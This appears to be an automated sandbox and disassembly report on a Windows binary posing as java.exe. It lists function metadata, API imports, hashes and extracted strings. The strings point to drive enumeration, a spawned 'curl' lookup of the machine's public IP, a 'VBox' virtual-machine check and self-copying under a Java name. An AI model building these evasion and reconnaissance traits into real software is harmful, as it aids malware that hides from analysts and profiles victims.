                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$_invalid_parameter_noinfo_noreturn$Drivememmove$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@D@std@@@1@@LogicalStringsTypeV?$basic_streambuf@memset
                                        • String ID: (CD-ROM)$ (Local)$ (Network)$ (RAM Disk)$ (Removable)$ (Unknown)$No drives detected
                                        • API String ID: 3633658073-1332592045
                                        • Opcode ID: fc386d3375d3b44eabae3c4723390cc2e52fbe90a3799c7f1168b13f9aec711b
                                        • Instruction ID: 2a4f32d8cb9b31cf85b175498110f855c1d7357e8fe5f8a1a126a4917db7805d
                                        • Opcode Fuzzy Hash: fc386d3375d3b44eabae3c4723390cc2e52fbe90a3799c7f1168b13f9aec711b
                                        • Instruction Fuzzy Hash: 2CD1C172B18B8185FF20CF65D6502AD7760FBA5794F484232EA6DA3A99DF7CD180CB40
                                        Function 00007FF65E1F61C0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 160fileprocesssynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CreateExceptionFileReadThrow$ObjectPipeProcessSingleWaitmemmove
                                        • String ID: CreatePipe failed$CreateProcess failed$System
                                        • API String ID: 1891516669-1096748438
                                        • Opcode ID: 3880c30b75bd352c9b1a29dab04add5514506e865d04dfa20b575b1e48a9bc5d
                                        • Instruction ID: f9c2d757a9905be059220a442b14d522826edff6c74451a061dea369a14ab5a0
                                        • Opcode Fuzzy Hash: 3880c30b75bd352c9b1a29dab04add5514506e865d04dfa20b575b1e48a9bc5d
                                        • Instruction Fuzzy Hash: 18717F32A08B8286FF10CF60EA506AD7761FBA4788F145136EA4DA3A68DF7CD595C740
                                        Function 00007FF65E1F1450 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 205COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 733 7ff65e1f1450-7ff65e1f14cd call 7ff65e1f34a0 736 7ff65e1f14d3-7ff65e1f14fc 733->736 737 7ff65e1f1556-7ff65e1f1563 call 7ff65e1f3c80 733->737 739 7ff65e1f14fe-7ff65e1f1505 736->739 740 7ff65e1f1519 736->740 742 7ff65e1f1568-7ff65e1f15a0 737->742 739->740 743 7ff65e1f1507-7ff65e1f150a 739->743 741 7ff65e1f151c-7ff65e1f1554 memmove * 3 740->741 741->742 746 7ff65e1f15a2-7ff65e1f15b4 742->746 747 7ff65e1f15d7-7ff65e1f1610 _popen 742->747 744 7ff65e1f1511-7ff65e1f1517 743->744 745 7ff65e1f150c-7ff65e1f150f 743->745 744->741 745->741 748 7ff65e1f15d2 call 7ff65e1fda34 746->748 749 7ff65e1f15b6-7ff65e1f15c9 746->749 750 7ff65e1f16a0-7ff65e1f16c2 fgets 747->750 751 7ff65e1f1616-7ff65e1f163c call 7ff65e1f34a0 747->751 748->747 749->748 754 7ff65e1f15cb-7ff65e1f15d1 _invalid_parameter_noinfo_noreturn 749->754 752 7ff65e1f16c4-7ff65e1f16c8 750->752 753 7ff65e1f170e-7ff65e1f173f _pclose 750->753 759 7ff65e1f1670-7ff65e1f169f call 7ff65e1fd9d0 751->759 763 7ff65e1f163e-7ff65e1f1650 751->763 757 7ff65e1f16d0-7ff65e1f16db 752->757 758 7ff65e1f1745-7ff65e1f1757 753->758 753->759 754->748 765 7ff65e1f16e0-7ff65e1f16e8 757->765 761 7ff65e1f175d-7ff65e1f1770 758->761 762 7ff65e1f166b call 7ff65e1fda34 758->762 761->762 766 7ff65e1f1776-7ff65e1f177f _invalid_parameter_noinfo_noreturn 761->766 762->759 763->762 767 7ff65e1f1652-7ff65e1f1665 763->767 765->765 770 7ff65e1f16ea-7ff65e1f170c call 7ff65e1f3200 fgets 765->770 767->762 767->766 770->753 770->757
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memmove$_invalid_parameter_noinfo_noreturnfgets$_pclose_popen
                                        • String ID: curl -s $https://api.ipify.org
                                        • API String ID: 4263605086-4145788705
                                        • Opcode ID: ae73d1421c309b4769a2fb54ff61077935537acb340cbfafb32d3ed8a36bdc6c
                                        • Instruction ID: 1cc886d5c3cc952779a1823dcd059627f0810794d92ab1cfb693438110ffe709
                                        • Opcode Fuzzy Hash: ae73d1421c309b4769a2fb54ff61077935537acb340cbfafb32d3ed8a36bdc6c
                                        • Instruction Fuzzy Hash: 7591D062F18B8181FE10CB64D6002BD2361FBA57A4F585331EE6D67A9AEF7CE581C740
                                        Function 00007FF65E1F4530 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 136COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 786 7ff65e1f4530-7ff65e1f4559 787 7ff65e1f4560-7ff65e1f4567 786->787 787->787 788 7ff65e1f4569-7ff65e1f4578 787->788 789 7ff65e1f4584 788->789 790 7ff65e1f457a-7ff65e1f457d 788->790 792 7ff65e1f4586-7ff65e1f4596 789->792 790->789 791 7ff65e1f457f-7ff65e1f4582 790->791 791->792 793 7ff65e1f459f-7ff65e1f45b1 ?good@ios_base@std@@QEBA_NXZ 792->793 794 7ff65e1f4598-7ff65e1f459e 792->794 795 7ff65e1f45e3-7ff65e1f45e9 793->795 796 7ff65e1f45b3-7ff65e1f45c2 793->796 794->793 797 7ff65e1f45f5-7ff65e1f4608 795->797 798 7ff65e1f45eb-7ff65e1f45f0 795->798 800 7ff65e1f45c4-7ff65e1f45c7 796->800 801 7ff65e1f45e1 796->801 803 7ff65e1f463d-7ff65e1f4658 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z 797->803 804 7ff65e1f460a 797->804 802 7ff65e1f46ad-7ff65e1f46cb ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 798->802 800->801 805 7ff65e1f45c9-7ff65e1f45df ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ ?good@ios_base@std@@QEBA_NXZ 800->805 801->795 806 7ff65e1f46cd-7ff65e1f46d6 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 802->806 807 7ff65e1f46d7-7ff65e1f46e7 802->807 809 7ff65e1f465a 803->809 810 7ff65e1f4686 803->810 808 7ff65e1f4610-7ff65e1f4613 804->808 805->795 806->807 811 7ff65e1f46f0-7ff65e1f4704 807->811 812 7ff65e1f46e9-7ff65e1f46ef 807->812 808->803 813 7ff65e1f4615-7ff65e1f462f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 808->813 814 7ff65e1f4660-7ff65e1f4663 809->814 815 7ff65e1f4689 810->815 812->811 817 7ff65e1f4631-7ff65e1f4636 813->817 818 7ff65e1f4638-7ff65e1f463b 813->818 816 7ff65e1f468d-7ff65e1f469d 814->816 819 7ff65e1f4665-7ff65e1f467f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 814->819 815->816 816->802 817->815 818->808 819->810 821 7ff65e1f4681-7ff65e1f4684 819->821 821->814
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F45A9
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF65E1F45C9
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F45D9
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F4626
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF65E1F464F
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F4676
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF65E1F46BC
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF65E1F46C3
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF65E1F46D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID: VBox
                                        • API String ID: 4121003011-8870058
                                        • Opcode ID: 8d9f1fcbf29990ccba68683eb9388bbe1b18308a65f00ed4dbf19797e9948431
                                        • Instruction ID: 43a57c6c12c10d19425375bd8f02ada352a04e5e74cb776f8ee984f6a251441a
                                        • Opcode Fuzzy Hash: 8d9f1fcbf29990ccba68683eb9388bbe1b18308a65f00ed4dbf19797e9948431
                                        • Instruction Fuzzy Hash: E8512E72608A4181EF21DF1AE690238A7A0FF95FA5F19C531EE6E937A0DF3DD4468350
                                        Function 00007FF65E1F47D0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 106fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: File$memmove$AttributesCopyFolderFreeKnownModuleNamePathTask_invalid_parameter_noinfo_noreturn
                                        • String ID: System$\java.exe
                                        • API String ID: 1966085478-2838124431
                                        • Opcode ID: 9df640e94e4460063b0ebfa5c6d29310eec143933f45953db38a7472d5bb157b
                                        • Instruction ID: c1cae39efa4f95323eba040c0d30252e2db170f92cedf2f80e0026646df9ecf8
                                        • Opcode Fuzzy Hash: 9df640e94e4460063b0ebfa5c6d29310eec143933f45953db38a7472d5bb157b
                                        • Instruction Fuzzy Hash: 4A41D132A18A8182EF20CF25E65436D7361FB98B94F445531EAADA3B98DF7CE194C340
                                        Function 00007FF65E1F3AC0 Relevance: 13.6, APIs: 9, Instructions: 131COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F3B25
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF65E1F3B45
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1F3B55
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F3B9C
                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF65E1F3BC9
                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF65E1F3BEA
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF65E1F3C30
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF65E1F3C37
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF65E1F3C44
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                        • String ID:
                                        • API String ID: 4121003011-0
                                        • Opcode ID: 32c923d81eb2f926df63972f162163bef63c4a2309fcb996621e0580ae7188cd
                                        • Instruction ID: 067fdf125ebc2e52267d891ebf92c725b04f7131eac7d41ad4e0ee6d6274cd74
                                        • Opcode Fuzzy Hash: 32c923d81eb2f926df63972f162163bef63c4a2309fcb996621e0580ae7188cd
                                        • Instruction Fuzzy Hash: 6F513032608A4181EF708F19D6A063CABA0FFA5F95F198532EE5E937A4CF3DD4468350
                                        Function 00007FF65E1F8AE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: memset$_invalid_parameter_noinfo_noreturnlocaleconvmalloc
                                        • String ID: Security$System
                                        • API String ID: 4120556116-2661570791
                                        • Opcode ID: 7e827c1aa1cd5d5c5d66c3ad686d95bbe85674a424d3ce88bcbd9dfe1239f2c9
                                        • Instruction ID: a5958d309c154395c78ae13f3b0513da79c5f218d2e59b09abb10c1b048eab3f
                                        • Opcode Fuzzy Hash: 7e827c1aa1cd5d5c5d66c3ad686d95bbe85674a424d3ce88bcbd9dfe1239f2c9
                                        • Instruction Fuzzy Hash: BE81C232A04BC186EB60CF25E9443AD37A0F7A9B94F188225EA9D97B95DF3CC581C750
                                        Function 00007FF65E1FDC1C Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                        • String ID:
                                        • API String ID: 1133592946-0
                                        • Opcode ID: a2b6e63c03c4307f1c7944bccec6fd587a45c4b5608812da48b03e94cda5521b
                                        • Instruction ID: 005a31784e9ee1f00b0105eab9ff6c6150fee0db45bb632082c4cc818f54a8af
                                        • Opcode Fuzzy Hash: a2b6e63c03c4307f1c7944bccec6fd587a45c4b5608812da48b03e94cda5521b
                                        • Instruction Fuzzy Hash: 39313B61A0C50381FE60BB2197157B92391AFA57C4F4C5139FA6EE72D7DE2CA40482F5
                                        Function 00007FF65E1FD9F0 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FDA0A
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1FDA20
                                          • Part of subcall function 00007FF65E1FE1EC: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF65E1FE1F5
                                          • Part of subcall function 00007FF65E1FE1EC: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF65E1FDA25,?,?,7FFFFFFFFFFFFFFF,00007FF65E1F3975), ref: 00007FF65E1FE206
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65E1FDA26
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
                                        • String ID:
                                        • API String ID: 594857686-0
                                        • Opcode ID: 9dee0384807c4d253cdcdcb94958414db6b7803d00181a6a14837a4265a6d2e0
                                        • Instruction ID: 0df02051cbc55ad94ea6f97a1d8d5f7d1a1b20f3ca28b55b66847e3e2c2df129
                                        • Opcode Fuzzy Hash: 9dee0384807c4d253cdcdcb94958414db6b7803d00181a6a14837a4265a6d2e0
                                        • Instruction Fuzzy Hash: 36E01280E1E14788FE782A621B251B401445F393B4F1C2B30F83EE52C3ED1CA88281B9
                                        Function 00007FF65E1F4710 Relevance: 4.5, APIs: 3, Instructions: 17COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF65E1F4725
                                        • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF65E1F4731
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF65E1F473A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@
                                        • String ID:
                                        • API String ID: 1875450691-0
                                        • Opcode ID: f4125d65197c8cd84bb38f550762ca1077ffddb23cb634167d8243e328fd1d8f
                                        • Instruction ID: 9e8df31c593a73e54e212829d68c54e77f45e5249969faa42b4cb05b2d1d9a27
                                        • Opcode Fuzzy Hash: f4125d65197c8cd84bb38f550762ca1077ffddb23cb634167d8243e328fd1d8f
                                        • Instruction Fuzzy Hash: 33D05B11B4460681EF085F16BEA44382320DF59F51B0C9431DD0F57394DD3CD0958300

                                        Non-executed Functions

                                        Function 00007FF65E1F6000 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 111encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32 ref: 00007FF65E1F6065
                                        • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F60A6
                                        • CryptStringToBinaryA.CRYPT32 ref: 00007FF65E1F60DF
                                        • _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F6195
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F6141
                                          • Part of subcall function 00007FF65E1F11E0: __std_exception_copy.VCRUNTIME140 ref: 00007FF65E1F121E
                                        • _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,System,?), ref: 00007FF65E1F61B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: BinaryCryptExceptionStringThrow$__std_exception_copy_invalid_parameter_noinfo_noreturnmemset
                                        • String ID: Failed to calculate decoded size$Failed to decode base64 string$System
                                        • API String ID: 1426166207-3746013482
                                        • Opcode ID: 14ac3170ead7c7aae9ce120748a7062de75bf1bef9c06f2a4d6b0291c8387342
                                        • Instruction ID: 28e309506083ef9c5f2e08dfb1cec9e51f71c9764c66a3a23a0ea0e2bb878826
                                        • Opcode Fuzzy Hash: 14ac3170ead7c7aae9ce120748a7062de75bf1bef9c06f2a4d6b0291c8387342
                                        • Instruction Fuzzy Hash: 6E419132A18B4681EE60DF11E54066A7361FBD57C0F584235FA9D93AA9DF3CE581CB80
                                        Function 00007FF65E1FE324 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2060431561.00007FF65E1F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65E1F0000, based on PE: true
                                        • Associated: 00000006.00000002.2060414733.00007FF65E1F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060452458.00007FF65E200000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060470362.00007FF65E207000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000006.00000002.2060486628.00007FF65E208000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff65e1f0000_java.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                        • String ID:
                                        • API String ID: 313767242-0
                                        • Opcode ID: 9976b80456451c459783d82c79ee402152503cdb330eb85bcad0ad8866f3e4c9
                                        • Instruction ID: 191b8a4bb5eae02fbfba77d81a176eb2f38ab94e75eaf0d206862dbb000cc0cf
                                        • Opcode Fuzzy Hash: 9976b80456451c459783d82c79ee402152503cdb330eb85bcad0ad8866f3e4c9
                                        • Instruction Fuzzy Hash: BF315D72608B8186EF608F60E9547EE7360FB94714F48443AEA4E97B98EF3CD648C714
                                        Function 00007FF65E1FB100 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 183COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1FB158
                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF65E1FB178
                                        • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF65E1FB188
                                        • ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF65E1FB1AD
                                        • ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF65E1FB1C0
                                        • ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF65E1FB1DD
                                        • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF65E1FB20F
                                        • ?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF65E1FB240
                                        • ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF65E1FB288
                                        • ?put@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QEBA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@AEAVios_base@2@DPEBUtm@@PEBD3@Z.MSVCP140 ref: 00007FF65E1FB31B
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF65E1FB338
                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140 ref: 00007FF65E1FB346
                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF65E1FB353
                                        Strings
